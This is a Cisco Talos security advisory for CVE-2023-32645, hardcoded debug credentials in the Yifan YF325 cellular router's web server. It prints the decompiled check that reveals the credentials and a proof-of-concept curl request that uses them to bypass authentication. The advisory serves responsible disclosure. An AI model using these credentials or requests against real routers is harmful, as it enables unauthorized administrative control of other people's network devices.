Headline
CVE-2023-32645: TALOS-2023-1752 || Cisco Talos Intelligence Group
A leftover debug code vulnerability exists in the httpd debug credentials functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to authentication bypass. An attacker can send a network request to trigger this vulnerability.
SUMMARY
A leftover debug code vulnerability exists in the httpd debug credentials functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to authentication bypass. An attacker can send a network request to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Yifan YF325 v1.0_20221108
PRODUCT URLS
YF325 - https://yifanwireless.com/entry-level-wifi-router/yf325-series-gprs/3g/4g-wifi-router-with-sim-card-slot.html
CVSSv3 SCORE
9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-489 - Leftover Debug Code
DETAILS
The Yifan YF325 is an industrial cellular router. This device is designed for M2M and IOT applications, allowing remote management, offering several VPN services and many other features.
The YF325 router provides a series of APIs, a set of which requires authentication prior to their execution. If the API requested requires valid credentials, they are checked by the httpd’s check_credentials function:
bool check_credentials
(char *correct_username,char *correct_password,undefined4 param_3,char *Authorization
)
{
[...]
provided_username._0_4_ = 0;
memset(provided_username + 4,0,0x1f0);
if (*correct_password == '\0') {
auth_ok:
auth_ok = true;
}
else {
if ((Authorization != (char *)0x0) && (idx = strncmp(Authorization,"Basic ",6), idx == 0)) {
[...]
[... base64 decode Authorization value into provided_username ...]
provided_password = strchr((char *)provided_username,L':');
if (provided_password != (char *)0x0) {
*provided_password = '\0';
is_equal = strcmp((char *)provided_username,"ffadmin"); [1]
if ((is_equal == 0) && (idx = strcmp(provided_password + 1,"ffadminff"), idx == 0)) [2]
goto auth_ok;
crypt_username = crypt((char *)provided_username,correct_username);
if ((crypt_username != (char *)0x0) &&
((idx = strcmp(crypt_username,correct_username), idx == 0 &&
(provided_password = crypt(provided_password + 1,correct_password),
provided_password != (char *)0x0)))) {
idx = strcmp(provided_password,correct_password);
return idx == 0;
}
}
}
auth_ok = false;
}
return auth_ok;
} This function will compare the provided username and password with the correct credentials, the ones of the admin. But, because of leftover debug code, there are some special debug credential, checked at `[1]` and `[2]`, that can bypass the credentials check, granting admin permissions with fixed credentials.
Exploit Proof of Concept
Following a request without credentials:
$ curl -s http://<ROUTER_IP>/Status_Router.asp | head -n 20
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>
[...] The resource is `Unauthorized`. Following the same request but with the debug credentials:
$ curl -s -H "Authorization: Basic ZmZhZG1pbjpmZmFkbWluZmY=" http://<ROUTER_IP>/Status_Router.asp
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=iso-8859-1; X-XSS-Protection: 1;mode=block" />
[...]
TIMELINE
2023-06-28 - Initial Vendor Contact
2023-07-06 - Vendor Disclosure
2023-10-11 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.
Related news
Attackers could exploit these vulnerabilities in the Yifan YF325 to carry out a variety of attacks, in some cases gaining the ability to execute arbitrary shell commands on the targeted device.